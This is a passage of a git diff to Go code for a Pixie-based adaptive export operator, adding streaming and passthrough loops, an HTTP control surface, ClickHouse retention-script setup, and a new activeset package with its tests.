supervisor.Run(ctx) + }() + log.WithField("tables", streamTables).Info("rev-3 streaming supervisor started") } -} -func disableClickHousePlugin(ctx context.Context, client *pixie.Client, cfg config.Config, clusterID string, clusterName string) error { - plugin, err := client.GetClickHousePlugin() - if err != nil { - return fmt.Errorf("getting data retention plugins failed: %w", err) + // 7c. Firehose passthrough loop — independent of fan-out / streaming. + // Off unless ADAPTIVE_PASSTHROUGH=true. Reuses the same adapter + + // sink so byte-shape of written rows matches the AE-filter phase. + if passthroughEnabled { + if pixieAdapterInst == nil { + log.Fatal("ADAPTIVE_PASSTHROUGH=true but pixie adapter is nil — internal wiring bug") + } + // Compiled path is the default; ADAPTIVE_PASSTHROUGH_COMPILED=false + // reverts to the legacy serial QueryFor loop. + compiled := !strings.EqualFold(os.Getenv(envPassthroughCompiled), "false") + ptCfg := passthrough.Config{ + Window: durEnv(envPassthroughWindow, 30*time.Second, time.Second), + Refresh: durEnv(envPassthroughRefresh, 30*time.Second, time.Second), + Rec: rec, + Hostname: hostname, + Compiled: compiled, + } + ptLoop := passthrough.New(&pixieAdapter{a: pixieAdapterInst}, snk, ptCfg) + wg.Add(1) + go func() { + defer wg.Done() + ptLoop.Run(ctx) + }() + log.WithFields(log.Fields{ + "window": ptCfg.Window, + "refresh": ptCfg.Refresh, + "compiled": ptCfg.Compiled, + }).Info("ADAPTIVE_PASSTHROUGH=true — firehose loop running (no anomaly gate)") } - if !plugin.RetentionEnabled { - log.Info("ClickHouse plugin already disabled; removing any lingering ch-* scripts") - } else { - if err := client.DisableClickHousePlugin(plugin.LatestVersion); err != nil { - return fmt.Errorf("failed to disable ClickHouse plugin: %w", err) + + log.WithFields(log.Fields{ + "hostname": hostname, + "poll_interval": pollInterval, + "prune_interval": pruneInterval, + "window_before": ctlCfg.Before, + "window_after": ctlCfg.After, + }).Info("operator running") + + // control surface: when CONTROL_ADDR is set, the per-node controller + // steers this AE's activeSet (Upsert/Remove) over HTTP. Off by default so + // the existing trigger→controller→activeSet flow is unchanged. + if addr := os.Getenv("CONTROL_ADDR"); addr != "" { + ctrlSrv := control.New(activeSet, nil) // OrderQuery runner wired later + ctrlSrv.SetGraphWriter(applier) // dx_attack_graph ingest → ClickHouse + // Bearer-JWT auth on the control surface (CodeRabbit: protect control + // endpoints). Same shared lib + signing key the broker/PEM use — dx + // attaches the service JWT it already mints. Default-OFF so this can + // merge before dx sends the bearer; flip CONTROL_REQUIRE_AUTH=true once + // dx is updated + PL_JWT_SIGNING_KEY is mounted. Safe incremental rollout. + if key := os.Getenv("PL_JWT_SIGNING_KEY"); key != "" && os.Getenv("CONTROL_REQUIRE_AUTH") == "true" { + ctrlSrv.SetAuth(key, "vizier") + log.Info("control surface: bearer-JWT auth ENABLED (audience=vizier)") + } else { + log.Warn("control surface: auth DISABLED (set CONTROL_REQUIRE_AUTH=true + PL_JWT_SIGNING_KEY)") } + // Wrap in an http.Server with explicit timeouts so a slow client + // can't pin a goroutine on the control surface (CodeRabbit + // r3379377432). The control plane is small/idempotent JSON, so + // short read/write budgets are fine. + httpSrv := &http.Server{ + Addr: addr, + Handler: ctrlSrv.Handler(), + ReadHeaderTimeout: 5 * time.Second, + ReadTimeout: 15 * time.Second, + WriteTimeout: 30 * time.Second, + IdleTimeout: 60 * time.Second, + } + go func() { + log.WithField("addr", addr).Info("control surface listening") + if err := httpSrv.ListenAndServe(); err != nil && + err != http.ErrServerClosed { + log.WithError(err).Error("control surface stopped") + } + }() } - // Tear down the per-cluster ch-* retention scripts so the demo can be re-run cleanly. - current, err := client.GetClusterScripts(clusterID, clusterName) - if err != nil { - return fmt.Errorf("failed to list retention scripts: %w", err) + sigCh := make(chan os.Signal, 1) + signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM) + <-sigCh + log.Info("shutdown signal received; waiting for goroutines to drain") + cancel() + // Bound the wait so a hung HTTP call can't keep the process up forever. + done := make(chan struct{}) + go func() { wg.Wait(); close(done) }() + select { + case <-done: + log.Info("clean shutdown") + case <-time.After(35 * time.Second): + log.Warn("shutdown deadline reached with goroutines still running; exiting") } - var errs []error - for _, s := range current { - log.Infof("Deleting retention script %s", s.Name) - if err := client.DeleteDataRetentionScript(s.ScriptId); err != nil { - errs = append(errs, err) - } +} + +// chHTTPEndpoint resolves the ClickHouse HTTP endpoint. Explicit env +// override wins; otherwise build "http://:8123" from config. +func chHTTPEndpoint(host, override string) string { + if override != "" { + return strings.TrimRight(override, "/") } - if len(errs) > 0 { - return fmt.Errorf("errors while deleting retention scripts: %v", errs) + if host == "" { + host = "localhost" } - return nil + return "http://" + host + ":8123" } -func enableClickHousePlugin(ctx context.Context, client *pixie.Client, cfg config.Config, clusterID string, clusterName string) error { - log.Info("Checking the current ClickHouse plugin configuration") - plugin, err := client.GetClickHousePlugin() - if err != nil { - return fmt.Errorf("getting data retention plugins failed: %w", err) +// resolveHostname picks the node identity for node-local scoping. +// REQUIRES NODE_NAME (set via k8s downward API spec.nodeName). The +// previous os.Hostname() fallback returned the POD hostname, not the +// node — making the operator silently miss its node's rows. +func resolveHostname() (string, error) { + if v := strings.TrimSpace(os.Getenv(envNodeName)); v != "" { + return v, nil } + return "", fmt.Errorf("%s env var is required (set via k8s downward API: valueFrom.fieldRef.fieldPath=spec.nodeName)", envNodeName) +} - enablePlugin := true - if plugin.RetentionEnabled { - enablePlugin = false - config, err := client.GetClickHousePluginConfig() - if err != nil { - return fmt.Errorf("getting ClickHouse plugin config failed: %w", err) - } - if config.ExportURL != cfg.ClickHouse().DSN() { - log.Info("ClickHouse plugin is configured with different DSN... Overwriting") - enablePlugin = true - } +// durEnv reads a positive-integer-valued duration env var. unit +// defines the unit (time.Second, time.Millisecond). Returns dflt on +// missing / unparseable / non-positive values — non-positive would +// either panic time.NewTicker or invert the attribution window, so +// we fall back to the default and log loudly. +func durEnv(key string, dflt, unit time.Duration) time.Duration { + v := strings.TrimSpace(os.Getenv(key)) + if v == "" { + return dflt + } + n, err := strconv.ParseInt(v, 10, 64) + if err != nil { + log.WithError(err).WithFields(log.Fields{"key": key, "value": v}). + Warn("invalid duration env; using default") + return dflt + } + if n <= 0 { + log.WithFields(log.Fields{"key": key, "value": v}). + Warn("non-positive duration env; using default") + return dflt } + return time.Duration(n) * unit +} - if enablePlugin { - log.Info("Enabling ClickHouse plugin") - err := client.EnableClickHousePlugin(&pixie.ClickHousePluginConfig{ - ExportURL: cfg.ClickHouse().DSN(), - }, plugin.LatestVersion) - if err != nil { - return fmt.Errorf("failed to enable ClickHouse plugin: %w", err) - } +// intEnv reads a positive-integer-valued env var. Returns dflt on +// missing / unparseable / non-positive. Same shape as durEnv but +// without the unit multiplier — for counts (e.g. row limits). +func intEnv(key string, dflt int) int { + v := strings.TrimSpace(os.Getenv(key)) + if v == "" { + return dflt + } + n, err := strconv.Atoi(v) + if err != nil { + log.WithError(err).WithFields(log.Fields{"key": key, "value": v}). + Warn("invalid int env; using default") + return dflt } + if n <= 0 { + log.WithFields(log.Fields{"key": key, "value": v}). + Warn("non-positive int env; using default") + return dflt + } + return n +} - log.Info("Setting up the data retention scripts") +// intEnvOrZero is like intEnv but treats unset / empty / non-positive +// as 0 (= "feature disabled"). Used for opt-in throttle knobs where 0 +// preserves legacy behavior and a positive integer enables the throttle. +func intEnvOrZero(key string) int { + v := strings.TrimSpace(os.Getenv(key)) + if v == "" { + return 0 + } + n, err := strconv.Atoi(v) + if err != nil || n < 0 { + log.WithFields(log.Fields{"key": key, "value": v}). + Warn("invalid int env; treating as 0 (disabled)") + return 0 + } + return n +} - log.Info("Getting preset script from the Pixie plugin") - defsFromPixie, err := client.GetPresetScripts() - if err != nil { - return fmt.Errorf("failed to get preset scripts: %w", err) +// durEnvOrZero is the duration-typed counterpart. unit lets the caller +// express the env value in seconds / milliseconds without per-knob +// parsing logic. 0 → returned as 0 (= feature disabled). +func durEnvOrZero(key string, unit time.Duration) time.Duration { + n := intEnvOrZero(key) + if n <= 0 { + return 0 } + return time.Duration(n) * unit +} - // Filter presets by an allow-list of case-insensitive substrings in the - // script name. Useful when the destination ClickHouse doesn't have every - // target table pre-created (Pixie's C++ ClickHouseExportSinkNode aborts - // kelvin on UNKNOWN_TABLE from CH — upstream bug), so we must not install - // retention scripts whose target table is missing. +// seedActiveSetFromRehydrate reads the operator's rehydrated +// attribution rows back from CH and Upserts them into the streaming +// ActiveSet. Without this, a restart in streaming mode leaves the +// scanners with an empty allowlist until the next kubescape event +// arrives — N minutes of coverage gap per restart. +func seedActiveSetFromRehydrate(ctl *controller.Controller, set *activeset.ActiveSet) { + // The controller's Rehydrate already populated its in-memory + // active map from CH. We re-issue QueryActive here to mirror + // those rows into the ActiveSet — keeping the streaming layer + // fully decoupled from controller internals. // - // Example: ALLOWED_RETENTION_SCRIPTS="conn_stats" installs only the - // conn_stats preset (matches "conn_stats export"), skipping dc_snoop + - // stack_traces which target tables that don't exist in soc's schema.sql. - // - // Empty/unset = no filter (install every preset — the prior behavior). - definitions := defsFromPixie - if allow := strings.TrimSpace(os.Getenv("ALLOWED_RETENTION_SCRIPTS")); allow != "" { - tokens := strings.Split(allow, ",") - filtered := make([]*script.ScriptDefinition, 0, len(defsFromPixie)) - for _, d := range defsFromPixie { - nameLower := strings.ToLower(d.Name) - for _, t := range tokens { - t = strings.ToLower(strings.TrimSpace(t)) - if t != "" && strings.Contains(nameLower, t) { - filtered = append(filtered, d) - break - } - } + // Timeout: defaults to 60s (bumped from a 30s hardcode for + // the rev-2 schema); ADAPTIVE_SCRIPT_TIMEOUT_SECONDS overrides for + // busy clusters where a large rehydrate snapshot won't land in + // the default window. Defensive: the operator could not reproduce + // the original "DeadlineExceeded" symptom on the soak PG, but + // the env knob exists so operators don't have to ship a patch + // to widen it. + scriptTimeout := durEnv("ADAPTIVE_SCRIPT_TIMEOUT_SECONDS", 60*time.Second, time.Second) + ctx, cancel := context.WithTimeout(context.Background(), scriptTimeout) + defer cancel() + rows, err := ctl.SnapshotActive(ctx) + if err != nil { + log.WithError(err).Warn("seed: SnapshotActive failed; streaming starts cold") + return + } + for _, r := range rows { + if r.Pod == "" { + continue } - log.Infof("ALLOWED_RETENTION_SCRIPTS=%q; filtered presets: %d of %d kept", allow, len(filtered), len(defsFromPixie)) - definitions = filtered + set.Upsert(activeset.Key{Namespace: r.Namespace, Pod: r.Pod}, r.TEnd) } + log.WithField("seeded", set.Size()).Info("streaming.ActiveSet seeded from rehydrated rows") +} - log.Infof("Getting current scripts for cluster") - currentScripts, err := client.GetClusterScripts(clusterID, clusterName) +// pixieAdapter wraps pixieapi.Adapter so its return type matches the +// controller's PixieQuerier interface (which uses []map[string]any +// rather than the pixieapi-internal Row alias). +type pixieAdapter struct{ a *pixieapi.Adapter } + +func (p *pixieAdapter) Query(ctx context.Context, src string) ([]map[string]any, error) { + rows, err := p.a.Query(ctx, src) if err != nil { - return fmt.Errorf("failed to get data retention scripts: %w", err) + return nil, err } - - actions := script.GetActions(definitions, currentScripts, script.ScriptConfig{ - ClusterName: clusterName, - ClusterId: clusterID, - CollectInterval: cfg.Worker().CollectInterval(), - }) - - var errs []error - - for _, s := range actions.ToDelete { - log.Infof("Deleting script %s", s.Name) - err := client.DeleteDataRetentionScript(s.ScriptId) - if err != nil { - errs = append(errs, err) - } + out := make([]map[string]any, len(rows)) + for i, r := range rows { + out[i] = map[string]any(r) } + return out, nil +} - for _, s := range actions.ToUpdate { - log.Infof("Updating script %s", s.Name) - err := client.UpdateDataRetentionScript(clusterID, s.ScriptId, s.Name, s.Description, s.FrequencyS, s.Script) - if err != nil { - errs = append(errs, err) +// installPresetScripts purges any stale ClickHouse-plugin retention +// scripts on the cluster, then installs the operator's built-in PxL +// scripts targeting the 13 socket_tracer tables we DDL'd. Cloud-side +// "presets" are deliberately ignored: in this fork the legacy +// "conn_stats export" / "dc snoop export" / "stack_traces export" +// preset names predate the rev-2 schema and would silently fail to +// write. conn_stats is now in the rev-2 schema, but it +// ships as "ch-conn_stats" (operator-managed naming) — the legacy +// "conn_stats export" preset name is still purged below so a stale +// one doesn't double-write. +func installPresetScripts(client *pixie.Client, clusterID, clusterName string) (int, error) { + current, err := client.GetClusterScripts(clusterID, clusterName) + if err != nil { + return 0, fmt.Errorf("get cluster scripts: %w", err) + } + currentNames := make([]string, 0, len(current)) + for _, s := range current { + currentNames = append(currentNames, s.Name) + } + log.WithFields(log.Fields{ + "already_on_cluster": len(current), + "cluster_script_names": currentNames, + }).Info("preset script install — purging managed + installing built-ins") + + // Purge ONLY scripts we recognise as operator-managed or as legacy + // presets we know are broken in the rev-2 schema. User-authored + // retention scripts are left alone. + for _, s := range current { + if !isOperatorManagedScript(s.Name) { + log.WithField("script", s.Name). + Debug("preset install — leaving user-authored script alone") + continue + } + if err := client.DeleteDataRetentionScript(s.ScriptID); err != nil { + log.WithError(err).WithField("script", s.Name).Warn("failed to delete stale script") + continue } + log.WithField("script", s.Name).Info("purged stale retention script") } - for _, s := range actions.ToCreate { - log.Infof("Creating script %s", s.Name) - err := client.AddDataRetentionScript(clusterID, s.Name, s.Description, s.FrequencyS, s.Script) - if err != nil { - errs = append(errs, err) + // Install built-ins. + presets := builtinPresetScripts() + installed := 0 + for _, p := range presets { + if err := client.AddDataRetentionScript(clusterID, p.Name, p.Description, p.FrequencyS, p.Script); err != nil { + log.WithError(err).WithField("script", p.Name).Warn("failed to install built-in script") + continue } + installed++ + log.WithField("script", p.Name).Info("installed retention script") } + return installed, nil +} - if len(errs) > 0 { - return fmt.Errorf("errors while setting up data retention scripts: %v", errs) +// isOperatorManagedScript decides whether a cluster-side retention +// script is safe to delete during INSTALL_PRESET_SCRIPTS. The criteria: +// +// 1. Anything with the "ch-" prefix matches the operator's own +// builtinPresetScripts naming (ch-
) — managed. +// 2. The legacy AOCC presets we explicitly want to retire because +// their target tables don't exist in the rev-2 schema: +// "conn_stats export", "dc snoop export", "stack_traces export". +// +// Any other script is assumed user-authored and left alone. +func isOperatorManagedScript(name string) bool { + if strings.HasPrefix(name, "ch-") { + return true } - - log.Info("All done! The ClickHouse plugin is now configured.") - return nil + switch name { + case "conn_stats export", "dc snoop export", "stack_traces export": + return true + } + return false } -func setupPixie(ctx context.Context, cfg config.Pixie, tries int, sleepTime time.Duration) (*pixie.Client, error) { - apiKey := cfg.APIKey() - host := cfg.Host() - log.Infof("setupPixie: API Key length=%d, Host=%s", len(apiKey), host) - - for tries > 0 { - // Use parent context - client stores this and uses it for all subsequent operations - client, err := pixie.NewClient(ctx, apiKey, host) - if err == nil { - return client, nil - } - tries -= 1 - log.WithError(err).Warning("error creating Pixie API client") - if tries > 0 { - time.Sleep(sleepTime) - } +// builtinPresetScripts returns a minimum set of PxL scripts mirroring +// the canonical Pixie preset shape — one bulk-write script per +// socket_tracer table. Each adds namespace + pod columns and emits to +// the matching CH table via px.display(name='
') which the +// retention plugin maps to forensic_db.
. +// +// Schedule: 10s. Window: -15s (overlap so we don't lose rows during +// schedule jitter). +func builtinPresetScripts() []*script.ScriptDefinition { + // Drop dotted-name tables (http2_messages.beta, kafka_events.beta): + // `px.DataFrame(table='…')` rejects them at PxL compile time, so a + // preset for them would be permanently broken. The cloud-side + // retention plugin would have to handle those if needed. + tables := []string{ + "http_events", "dns_events", "redis_events", "mysql_events", + "pgsql_events", "cql_events", "mongodb_events", "amqp_events", + "mux_events", "tls_events", + // conn_stats — counter snapshots; same shape as + // the protocol-events PxL (DataFrame + namespace/pod cols + + // px.display). Each pull is one snapshot row per (remote tuple, + // protocol); ClickHouse merges by (hostname, event_time). + "conn_stats", + } + out := make([]*script.ScriptDefinition, 0, len(tables)) + for _, t := range tables { + body := "import px\n" + + "df = px.DataFrame(table='" + t + "', start_time='-15s')\n" + + "df.namespace = px.upid_to_namespace(df.upid)\n" + + "df.pod = px.upid_to_pod_name(df.upid)\n" + + "px.display(df, '" + t + "')\n" + out = append(out, &script.ScriptDefinition{ + Name: "ch-" + t, + Description: "adaptive_export builtin preset for " + t, + FrequencyS: 10, + Script: body, + IsPreset: false, + }) } - return nil, fmt.Errorf("exceeded maximum number of retries") + return out } diff --git a/src/vizier/services/adaptive_export/internal/activeset/BUILD.bazel b/src/vizier/services/adaptive_export/internal/activeset/BUILD.bazel new file mode 100644 index 00000000000..9003a0f131d --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/activeset/BUILD.bazel @@ -0,0 +1,25 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "activeset", + srcs = ["activeset.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], +) + +pl_go_test( + name = "activeset_test", + srcs = ["activeset_test.go"], + embed = [":activeset"], +) diff --git a/src/vizier/services/adaptive_export/internal/activeset/activeset.go b/src/vizier/services/adaptive_export/internal/activeset/activeset.go new file mode 100644 index 00000000000..3cbc40ff390 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/activeset/activeset.go @@ -0,0 +1,267 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package activeset owns the "currently being streamed" pod set for +// the rev-3 adaptive-write streaming path. One ActiveSet per +// operator process. +// +// Why it exists: rev-2's pushPixieRows fan-out gated streaming +// per-(hash, table); the fan-out spawned an O(active_hashes × tables) +// concurrency tree that DoS'd vizier-query-broker under load. Rev-3 +// inverts the relationship: ONE PxL submission per table per refresh, +// embedding an allowlist drawn from this ActiveSet. The set is keyed +// per-pod, not per-hash, because pixie events have no hash dimension +// — multiple anomaly hashes on the same pod share one stream slot. +// +// Membership is computed from kubescape attribution: a pod is in the +// set iff there is at least one anomaly-attribution row for it whose +// t_end is in the future. +package activeset + +import ( + "sync" + "time" +) + +// Key identifies one pod in the set. "namespace/pod" matches what +// `px.upid_to_pod_name` returns inside PxL, so embedding Keys verbatim +// into a PxL allowlist filter requires no transformation. +type Key struct { + Namespace string + Pod string +} + +// Render returns the "namespace/pod" form used in PxL allowlists. +// Pod-only Keys (empty Namespace) render as bare "pod" — kept for +// host-pid edge cases though those don't currently reach a stream. +func (k Key) Render() string { + if k.Namespace == "" { + return k.Pod + } + return k.Namespace + "/" + k.Pod +} + +// Delta describes a change to the set. Subscribers receive deltas +// to know when to re-evaluate stream submissions. Both slices may +// be non-empty in a single delta when concurrent upserts and prunes +// land in the same delivery window. +type Delta struct { + Added []Key + Removed []Key + Version uint64 // monotonic; matches the post-delta version of the set +} + +// ActiveSet is a goroutine-safe, version-counted pod set with +// fan-out delta delivery. +type ActiveSet struct { + mu sync.Mutex + members map[Key]time.Time // pod → t_end (when the active window expires absent further extension) + version uint64 + + // subs are independent buffered channels — one per subscriber. + // Buffered so a slow consumer can't block an upserter; oldest + // delta is dropped on overflow (subscriber observes a version + // skip and is expected to re-snapshot). + subsMu sync.Mutex + subs []chan Delta +} + +// New returns an empty ActiveSet. +func New() *ActiveSet { + return &ActiveSet{ + members: map[Key]time.Time{}, + } +} + +// Upsert sets or extends a pod's t_end. Idempotent — if the pod is +// already present with a >= t_end, no delta is emitted (caller-side +// dedup of trivial extensions; saves debouncer churn). +// +// `version` is advanced ONLY on membership changes (new pod added). +// A pure t_end extension does NOT bump version — subscribers use +// version skips as their "membership might have changed" signal, and +// spurious bumps force unnecessary re-snapshots. +func (s *ActiveSet) Upsert(k Key, tEnd time.Time) { + s.mu.Lock() + prev, existed := s.members[k] + if existed && !tEnd.After(prev) { + s.mu.Unlock() + return // no-op extension; quietly skip + } + s.members[k] = tEnd + if existed { + // Pure t_end extension: store new value, no version bump, + // no delta. Subscribers see no membership change. + s.mu.Unlock() + return + } + s.version++ + v := s.version + s.mu.Unlock() + s.broadcast(Delta{Added: []Key{k}, Version: v}) +} + +// Remove drops a pod. No-op if not present. Always emits a delta on +// real removals so subscribers can shrink allowlists. +func (s *ActiveSet) Remove(k Key) { + s.mu.Lock() + if _, ok := s.members[k]; !ok { + s.mu.Unlock() + return + } + delete(s.members, k) + s.version++ + v := s.version + s.mu.Unlock() + s.broadcast(Delta{Removed: []Key{k}, Version: v}) +} + +// PruneExpired removes every pod whose t_end is at or before `at`. +// Returns the removed keys for caller-side logging. Emits ONE delta +// containing all removals so subscribers re-evaluate once. +func (s *ActiveSet) PruneExpired(at time.Time) []Key { + s.mu.Lock() + var removed []Key + for k, tEnd := range s.members { + if !tEnd.After(at) { + removed = append(removed, k) + delete(s.members, k) + } + } + if len(removed) == 0 { + s.mu.Unlock() + return nil + } + s.version++ + v := s.version + s.mu.Unlock() + s.broadcast(Delta{Removed: removed, Version: v}) + return removed +} + +// Snapshot returns the current set + version atomically. Caller owns +// the returned slice — safe to mutate. Use this on subscription to +// build the initial allowlist before listening for deltas. +func (s *ActiveSet) Snapshot() ([]Key, uint64) { + s.mu.Lock() + defer s.mu.Unlock() + out := make([]Key, 0, len(s.members)) + for k := range s.members { + out = append(out, k) + } + return out, s.version +} + +// Size returns the current membership count (test + metric helper). +func (s *ActiveSet) Size() int { + s.mu.Lock() + defer s.mu.Unlock() + return len(s.members) +} + +// Subscribe returns a channel of deltas. Buffer size sets the +// tolerance for slow consumers; the channel drops oldest deltas on +// overflow and subscribers MUST re-snapshot if they detect a version +// gap. Channel is closed when ctx-equivalent shutdown is signalled +// via Unsubscribe. +// +// Race hazard: a caller that does `Snapshot()` then `Subscribe()` +// can miss any membership change that lands between the two calls. +// Prefer `SubscribeAndSnapshot()` which is atomic. +func (s *ActiveSet) Subscribe(buffer int) <-chan Delta { + if buffer < 1 { + buffer = 1 + } + ch := make(chan Delta, buffer) + s.subsMu.Lock() + s.subs = append(s.subs, ch) + s.subsMu.Unlock() + return ch +} + +// SubscribeAndSnapshot atomically captures the current membership +// AND registers the subscription, so the consumer is guaranteed to +// see EVERY change that lands at or after the returned version +// without losing changes in the race window between the two. +// +// Returned tuple: +// +// keys — current membership at snapshot time +// deltas — channel that will receive every future delta +// version — the version of `keys`; consumers can filter the +// channel by `delta.Version > version` +// +// This is the recommended consumer API for bootstrapping. +func (s *ActiveSet) SubscribeAndSnapshot(buffer int) ([]Key, <-chan Delta, uint64) { + if buffer < 1 { + buffer = 1 + } + ch := make(chan Delta, buffer) + // Hold BOTH mutexes for the duration of {snapshot, register}. + // Order: s.mu first (membership), then s.subsMu (subscriber list). + // broadcast() takes only s.subsMu, so there's no ordering risk. + s.mu.Lock() + keys := make([]Key, 0, len(s.members)) + for k := range s.members { + keys = append(keys, k) + } + version := s.version + s.subsMu.Lock() + s.subs = append(s.subs, ch) + s.subsMu.Unlock() + s.mu.Unlock() + return keys, ch, version +} + +// Unsubscribe removes and closes a previously-returned channel. +// Idempotent (no error on unknown chan). +func (s *ActiveSet) Unsubscribe(ch <-chan Delta) { + s.subsMu.Lock() + defer s.subsMu.Unlock() + for i, c := range s.subs { + // compare on the directional alias — Go permits this implicit conversion + if (<-chan Delta)(c) == ch { + s.subs = append(s.subs[:i], s.subs[i+1:]...) + close(c) + return + } + } +} + +// broadcast attempts to send to every subscriber non-blockingly. On +// buffer overflow the OLDEST delta is dropped so the most recent +// state-change always reaches the subscriber (it'll re-snapshot if +// the version gap matters). This is the contract: subscribers MUST +// tolerate dropped deltas + use Snapshot to reconcile. +func (s *ActiveSet) broadcast(d Delta) { + s.subsMu.Lock() + defer s.subsMu.Unlock() + for _, c := range s.subs { + select { + case c <- d: + default: + // Drop oldest by draining one then sending. + select { + case <-c: + default: + } + select { + case c <- d: + default: + } + } + } +} diff --git a/src/vizier/services/adaptive_export/internal/activeset/activeset_test.go b/src/vizier/services/adaptive_export/internal/activeset/activeset_test.go new file mode 100644 index 00000000000..47ff9ad7c78 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/activeset/activeset_test.go @@ -0,0 +1,225 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package activeset + +import ( + "sync" + "testing" + "time" +) + +func TestUpsertEmitsAddedDelta(t *testing.T) { + s := New() + ch := s.Subscribe(4) + s.Upsert(Key{Namespace: "ns", Pod: "p1"}, time.Now().Add(5*time.Minute)) + select { + case d := <-ch: + if len(d.Added) != 1 || d.Added[0].Pod != "p1" { + t.Fatalf("expected added=[p1], got %+v", d) + } + case <-time.After(200 * time.Millisecond): + t.Fatalf("no delta") + } +} + +func TestUpsertExtendDoesNotEmitDelta(t *testing.T) { + s := New() + ch := s.Subscribe(4) + k := Key{Namespace: "ns", Pod: "p1"} + t0 := time.Now() + s.Upsert(k, t0.Add(1*time.Minute)) + <-ch // drain initial add + s.Upsert(k, t0.Add(5*time.Minute)) + select { + case d := <-ch: + t.Fatalf("unexpected delta on pure extension: %+v", d) + case <-time.After(100 * time.Millisecond): + // good + } +} + +func TestRemoveEmitsRemovedDelta(t *testing.T) { + s := New() + ch := s.Subscribe(4) + k := Key{Namespace: "ns", Pod: "p1"} + s.Upsert(k, time.Now().Add(1*time.Minute)) + <-ch + s.Remove(k) + select { + case d := <-ch: + if len(d.Removed) != 1 || d.Removed[0].Pod != "p1" { + t.Fatalf("expected removed=[p1], got %+v", d) + } + case <-time.After(200 * time.Millisecond): + t.Fatalf("no delta") + } +} + +func TestPruneExpiredBatchesRemovals(t *testing.T) { + s := New() + ch := s.Subscribe(4) + now := time.Now() + s.Upsert(Key{Pod: "a"}, now.Add(-time.Minute)) // already expired + s.Upsert(Key{Pod: "b"}, now.Add(time.Minute)) // still active + s.Upsert(Key{Pod: "c"}, now.Add(-time.Second)) // already expired + // drain the three add deltas + for i := 0; i < 3; i++ { + <-ch + } + removed := s.PruneExpired(now) + if len(removed) != 2 { + t.Fatalf("expected 2 removals, got %d (%v)", len(removed), removed) + } + select { + case d := <-ch: + if len(d.Removed) != 2 { + t.Fatalf("expected single delta with 2 removals, got %+v", d) + } + case <-time.After(200 * time.Millisecond): + t.Fatalf("no delta from PruneExpired") + } +} + +func TestUpsertExtendDoesNotAdvanceVersion(t *testing.T) { + // Per CR feedback (activeset.go:110): pure extension shouldn't + // bump version, because the version is the consumer's "did + // membership change?" signal. Spurious bumps make subscribers + // re-snapshot for nothing. + s := New() + k := Key{Pod: "p"} + s.Upsert(k, time.Now().Add(time.Minute)) + _, v1 := s.Snapshot() + // Extend the SAME pod's t_end repeatedly. + for i := 0; i < 10; i++ { + s.Upsert(k, time.Now().Add(time.Duration(i+2)*time.Minute)) + } + _, v2 := s.Snapshot() + if v2 != v1 { + t.Fatalf("version advanced on pure extension: v1=%d v2=%d", v1, v2) + } + // But a new pod DOES advance. + s.Upsert(Key{Pod: "q"}, time.Now().Add(time.Minute)) + _, v3 := s.Snapshot() + if v3 == v2 { + t.Fatalf("version did NOT advance on new pod add: v=%d", v3) + } +} + +func TestSnapshotReturnsCurrentMembers(t *testing.T) { + s := New() + s.Upsert(Key{Namespace: "n1", Pod: "p1"}, time.Now().Add(time.Minute)) + s.Upsert(Key{Namespace: "n2", Pod: "p2"}, time.Now().Add(time.Minute)) + keys, v := s.Snapshot() + if len(keys) != 2 { + t.Fatalf("expected 2 keys, got %d", len(keys)) + } + if v == 0 { + t.Fatalf("version should have advanced") + } +} + +func TestSubscriberOverflowDropsOldest(t *testing.T) { + s := New() + ch := s.Subscribe(2) // tiny buffer + for i := 0; i < 10; i++ { + s.Upsert(Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute)) + } + // We expect at most buffer-size deltas to survive — the rest were dropped. + collected := 0 + for { + select { + case <-ch: + collected++ + case <-time.After(50 * time.Millisecond): + if collected == 0 { + t.Fatalf("got zero deltas; broadcast is broken") + } + if collected > 2 { + t.Fatalf("got %d deltas from a 2-buffer channel; drop-oldest broken", collected) + } + return + } + } +} + +// TestSubscribeAndSnapshot_RaceFreeBootstrap — per CR (activeset.go:183): +// a consumer that wants both "initial state" + "all future deltas" +// must be able to do so without missing changes between Snapshot() +// and Subscribe(). Verify the combined helper. +func TestSubscribeAndSnapshot_RaceFreeBootstrap(t *testing.T) { + s := New() + s.Upsert(Key{Pod: "preexisting"}, time.Now().Add(time.Minute)) + + // Simulate a hostile interleaving: between when we'd call Snapshot + // and when we'd call Subscribe, a concurrent Upsert lands. + // Without a combined helper, we'd miss it. The combined helper + // must report the new pod EITHER in the initial set OR in the + // first delta — never lost. + keys, ch, version := s.SubscribeAndSnapshot(4) + // Concurrent upsert AFTER subscription. + go func() { + s.Upsert(Key{Pod: "racy"}, time.Now().Add(time.Minute)) + }() + + if len(keys) != 1 || keys[0].Pod != "preexisting" { + t.Fatalf("initial snapshot wrong: %+v", keys) + } + // Drain delta. + select { + case d := <-ch: + if d.Version <= version { + t.Fatalf("delta version %d <= snapshot version %d", d.Version, version) + } + 